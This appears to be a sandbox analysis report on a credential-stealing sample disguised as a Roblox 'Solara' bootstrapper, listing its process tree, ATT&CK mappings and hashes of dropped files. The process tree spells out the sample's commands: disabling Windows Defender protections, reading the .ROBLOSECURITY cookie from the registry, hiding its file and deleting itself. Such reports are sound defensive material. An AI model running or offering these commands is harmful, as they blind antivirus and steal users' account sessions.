        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        9⤵
        Executes dropped EXE
        
        PID:3424
    - - C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:3212
    - - C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4900
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        6⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        7⤵
        
        PID:2028
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        8⤵
        Executes dropped EXE
        
        PID:1868
  - - C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
      "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
      4⤵
      Executes dropped EXE
      PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2464
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        5⤵
        
        PID:4800
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        6⤵
        
        PID:3752
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        7⤵
        Executes dropped EXE
        
        PID:4336
- - C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
    "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
    3⤵
    - Executes dropped EXE
    PID:4900
- - C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
      4⤵
      PID:3760
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        5⤵
        
        PID:3620
      - C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        6⤵
        Executes dropped EXE
        
        PID:3928
- C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
  "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
    3⤵
    - Views/modifies file attributes
    PID:5072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3996
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4372
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3636
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4060
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
    3⤵
    PID:2004
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:4948
- C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
    3⤵
    PID:1200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
      4⤵
      PID:2676
    - - C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        5⤵
        Executes dropped EXE
        
        PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SolaraBootstrapper.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UnZiper.exe.log

Filesize
1KB

MD5
5cb90c90e96a3b36461ed44d339d02e5

SHA1
5508281a22cca7757bc4fbdb0a8e885c9f596a04

SHA256
34c15d8e79fef4bddec7e34f3426df3b68f8fc6deac29ea12d110f6c529fe3bb

SHA512
63735938c841c28824e3482559df18839930acc5ea8600b1074439b70a2f600a92f41593568e49991f25f079e7f7361b4f1678feadbf004f6e9e4d51d36598d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dIIhost.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d2932b2d6c762219b89d39dd11312e00

SHA1
00889ebbf99006d613f52ebbe020aa929047704f

SHA256
97265e6a6d22bb41ad2a3da792f17177fb4193212fc61758473ce5179103b92a

SHA512
549b5f6ade05038909090dea05f2a314e4ff3e3e88adb3a9d414ccab7dcd17ab5db6598f8df3fdd1e4b45ccd0be28b27153f16cc775c9a584056c7ea25238901

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c6aae9fb57ebd2ae201e8d174d820246

SHA1
58140d968de47bcf9c78938988a99369bbdb1f51

SHA256
bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08

SHA512
5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
966914e2e771de7a4a57a95b6ecfa8a9

SHA1
7a32282fd51dd032967ed4d9a40cc57e265aeff2

SHA256
98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

SHA512
dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8916e154c5f09e8e26780ab9a279d25f

SHA1
25b1b7a637cb3f57329efbfccdc9ed9b67da30b2

SHA256
3881bf61c694a3f517c78904a36efff7812c2664d4965de471b36737f7c90075

SHA512
38baf68637754aee48205a854eb7f74619390e6bc1fcb0cdcc397a696ce7441d9f9e90ed7a66c22c6fc073eacc17cd7e45afeab833b2909f92259a2bc1b8a26f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eeb6ad386d143f278077171fc01a81e8

SHA1
43cff1bd7240965bfb2f10e47c0cec0f94332e2d

SHA256
59d62f9472b4c00b7cae0ee702789fa2b0042c468e4de9421d2430f9973eb00d

SHA512
b40f003e6d97adaaf05809f06d12df01984943d9eb6c44eaeffef90df8de0040373150c9714b11a42db5189b7064eeed0609a39f6f1feb91b05dd1835333e8f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
227556da5e65f6819f477756808c17e4

SHA1
6ffce766e881ca2a60180bb25f4981b183f78279

SHA256
101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

SHA512
d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
15dd61188e01dff83e0f47d441b21af5

SHA1
e26521b9eb5c21dd9b9bfb69618e7c80e4847bc9

SHA256
2f1d635b20401a13d3e43f797200c4b99d2dadbb1e01e6ab8cc5348783b193c6

SHA512
e40ad249392a90107d5448bee92ef45bf9164c2a106a39d2ea7b93ce22fce72af8a6732bac83fef32fbaefd915d51a0143c3e7409e74b17e0ce063c6d32100ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
724bc7abdbaa4bb021d728aac3000af1

SHA1
8bb319c3ef68cf5db7d56a1e397c94ca65d2cce6

SHA256
07d38b887ae11e664a613dc698d8de4771dec3cdb7837d59b00f421114e27c04

SHA512
501872716cea55c46ccb0c5ccf6835733f84e5a653a285729b6757c38952a582985fb7c76643cda0b32390ea9bca4de35d2fbe34ba1c6f3106f803225cafd88e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
0b8cb2e6dd5794b6a56a4bdbbd430fd7

SHA1
2b08e348c3489c6a35761af073018e3784c12074

SHA256
bcce0d44e33747e4c39df9afbd0a4e98a47ded0188375e4dfdd94cafbb366e1f

SHA512
15ce3b588aa80899f69b0313c7e188d886bddbd09783ca732ac33f9ae8e4e017a72b6f98919f581383a4582732575e5faedb0dea87e01cf2b657424945fdf4d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\JipzecQmszbCJX3

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe

Filesize
2.1MB

MD5
97bec430634bb8e59d4273c9a395a702

SHA1
a8a04f26cec00ef32501ebe35252d08aaa7e3634

SHA256
57a2fe6374ced2c9c7e2be59d3eca0815188778308e59295d6a868d3e5c4237e

SHA512
8563d6608337071a89f7b0b7739001a456be19c51dea0f715317c6dbfce9986c59527f39ec7cdcc71007abdd8955996d26835105712e80cd700e086b8d1165a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

Filesize
1.7MB

MD5
084ab0f114778618e30666e451581845

SHA1
0013eacb10d1f89dff71296defa5db17704d3347

SHA256
8cf0041d9b5a8ab1fa037c475de20ba1389711d9d4e80fb9638138840f28c649

SHA512
0c20196d8810e5c05c1b0b284804c7aa5f05a41bdcf19eb3c983702f8b176fb6e4000e3b3b2ec1da9f8973c9bc0feca9e4446817731104d174c0ba1fdd85cd06

Download Submit
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\VoUbehJLiQRPcfk

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\WGP0m3Wo7NZp8LM\Display\Display.png

Filesize
423KB

MD5
d4b4ba038423239047a9130a6a741659

SHA1
a0d511e38fc7e0112d3237257b87211e5b9d0d51

SHA256
ee0f530848adf85e4d4d51fc8ab61df06faa59a980637e80bbce32377c37d8d1

SHA512
c370d44d83acdd599de432538717948be1f837940fa2d3d54fe34caa75e0030154e6d1c0fae96894c685c333e280b0fd526d3d5899f16b37ac32b440dd9a519c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cx5biz4n.b2x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe

Filesize
231KB

MD5
c05f91c69a98089ded3951424da86771

SHA1
0c4c6437efad5f0e1e3e290fb0a9c069cd4a86ed

SHA256
94c820d3a1216c2ea30f7960f60d8324399a522d3e090711aafc6f5d0b860ac5

SHA512
3ba5631dcc8b839ec1d75a408b10047c3a6713791caa5b7d0fa4df69fcd264df50424404d410727c532de77fc95c082faad3cebae1637c87a146c9bf5979fcc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\x1dZQdFlu5oiJDr

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\WinRAR\UnZiper.exe

Filesize
1.8MB

MD5
c06bb1f0ea507c8d8767f269725df3c0

SHA1
9555e62e99b3bd5af80e7870ab15c38dc97c1757

SHA256
43d0e85345ce2caf4c9b2805c7e5da6a6f7c523f256a46cfeebea9a0eb4f5dce

SHA512
0a14e81ab09263b75f4be83f11cfcd1e9bc903d22aeeae0bf797a97bb261e5700a55bcc3e65ff48a41c01170686e42a756bfabb1769d0efd2b58e62d83bb6197

Download Submit
C:\WinRAR\jLO855Jnqn959BA8qy.bat

Filesize
23B

MD5
cbad1e030a37190ced948f45d7582691

SHA1
b1590dc4a67cd1b56b6b0ff42d48325de7bb8ea5

SHA256
8d910a7da0bc8d3baf495648cc0fef5391e8d7486cfc027827d3828a488f7571

SHA512
ce98091245080506c15afd1eba8847e410b43c689ef38b4c971881a0888588cbac39234d73f783ad4f4f113c7fe07d066d4f5e1a2181854b70a032f4308fca92

Download Submit
C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe

Filesize
201B

MD5
fb6995d84ff8765f8985b39021495a02

SHA1
da911e465774c0769bc5b6fb10801c08e769b607

SHA256
048d54b81f8126090f61d30d736d677fe62a4eb683b5a7618c91020e7fc10ff5

SHA512
ea763e3864f726cd58979dee75100cce8692e81ca67fbbcf863f5244c7a127580b71588a2675bc108599109e8e77af7351f85900d0afb65acb98eeb4100632db

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/628-169-0x0000000000480000-0x0000000000652000-memory.dmp

Filesize
1.8MB

Download
memory/628-170-0x0000000002740000-0x000000000274E000-memory.dmp

Filesize
56KB

Download
memory/684-47-0x000001A5EA350000-0x000001A5EA372000-memory.dmp

Filesize
136KB

Download
memory/1028-86-0x000002C3783E0000-0x000002C378456000-memory.dmp

Filesize
472KB

Download
memory/1028-36-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1028-88-0x000002C378360000-0x000002C37837E000-memory.dmp

Filesize
120KB

Download
memory/1028-87-0x000002C3784B0000-0x000002C378500000-memory.dmp

Filesize
320KB

Download
memory/1028-127-0x000002C378460000-0x000002C378472000-memory.dmp

Filesize
72KB

Download
memory/1028-25-0x000002C375CB0000-0x000002C375CF0000-memory.dmp

Filesize
256KB

Download
memory/1028-164-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1028-126-0x000002C3783A0000-0x000002C3783AA000-memory.dmp

Filesize
40KB

Download
memory/3440-32-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3440-35-0x0000000000610000-0x00000000007C2000-memory.dmp

Filesize
1.7MB

Download
memory/3440-70-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3552-37-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3552-0-0x00007FFB58523000-0x00007FFB58525000-memory.dmp

Filesize
8KB

Download
memory/3552-10-0x00007FFB58520000-0x00007FFB58FE1000-memory.dmp

Filesize
10.8MB

Download
memory/3552-1-0x00000000003D0000-0x000000000072C000-memory.dmp

Filesize
3.4MB

Download